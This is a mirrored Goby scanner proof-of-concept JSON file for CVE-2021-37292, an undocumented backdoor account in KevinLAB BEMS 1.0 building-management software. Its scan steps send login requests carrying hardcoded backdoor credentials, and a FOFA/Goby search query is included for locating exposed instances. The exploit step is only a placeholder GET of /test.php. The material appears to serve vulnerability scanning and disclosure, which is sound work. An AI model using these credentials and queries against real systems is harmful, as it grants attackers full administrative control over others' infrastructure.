qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/KevinLAB-BEMS-1.0-backdoor-...

191 lines
7.3 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "KevinLAB BEMS 1.0 backdoor (CVE-2021-37292)",
"Description": "<p>KevinLAB BEMS has an undocumented backdoor account, and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel, and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely.<br></p>",
"Product": "4ST BEMS 1.0.0",
"Homepage": "http://www.kevinlab.com",
"DisclosureDate": "2022-06-15",
"Author": "twcjw",
"FofaQuery": "body=\"requestUrl = '../http/index.php'\"",
"GobyQuery": "body=\"requestUrl = '../http/index.php'\"",
"Level": "3",
"Impact": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel, and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely.</span><br></p>",
"Recommendation": "<p>none</p>",
"References": [
"https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php"
],
"Is0day": false,
"HasExp": false,
"ExpParams": [],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"OR",
{
"Request": {
"method": "POST",
"uri": "/http/index.php",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
},
"data_type": "text",
"data": "requester=login&request=login&params=%5B%7B%22name%22%3A%22input_id%22%2C%22value%22%3A%22kevinlab%22%7D%2C%7B%22name%22%3A%22input_passwd%22%2C%22value%22%3A%22kevin003%22%7D%5D"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "result",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "true",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/http/index.php",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
},
"data_type": "text",
"data": "requester=login&request=login&params=%5B%7B%22name%22%3A%22input_id%22%2C%22value%22%3A%22developer1%22%7D%2C%7B%22name%22%3A%22input_passwd%22%2C%22value%22%3A%221234%22%7D%5D"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "result",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "true",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"Tags": [
"Backdoor"
],
"VulType": [
"Backdoor"
],
"CVEIDs": [
"CVE-2021-37292"
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "9.8",
"Translation": {
"CN": {
"Name": "KevinLAB BEMS 1.0 后门CVE-2021-37292",
"Product": "4ST L-BEMS 1.0.0",
"Description": "<p>&nbsp;KevinLAB BEMS 包含一个未记录的后门帐户。这些凭据集永远不会向最终用户公开并且不能通过任何正常操作进行修改。攻击者可以通过使用具有最高管理权限的后门账号登录来利用此漏洞获得完全的系统控制权。在管理面板的用户设置中看不到后门用户它还使用未记录的权限级别admin_pk= 1该权限级别允许BEMS远程提供的功能完全可用。<br></p>",
"Recommendation": "<p>无</p>",
"Impact": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">攻击者可以通过使用具有最高管理权限的后门账号登录来利用此漏洞,获得完全的系统控制权。</span><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">在管理面板的用户设置中看不到后门用户它还使用未记录的权限级别admin_pk= 1该权限级别允许BEMS远程提供的功能完全可用。</span><br></p>",
"VulType": [
"后⻔"
],
"Tags": [
"后⻔"
]
},
"EN": {
"Name": "KevinLAB BEMS 1.0 backdoor (CVE-2021-37292)",
"Product": "4ST BEMS 1.0.0",
"Description": "<p>KevinLAB BEMS has an undocumented backdoor account, and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel, and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely.<br></p>",
"Recommendation": "<p>none</p>",
"Impact": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel, and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely.</span><br></p>",
"VulType": [
"Backdoor"
],
"Tags": [
"Backdoor"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}
Reference in New Issue View Git Blame Copy Permalink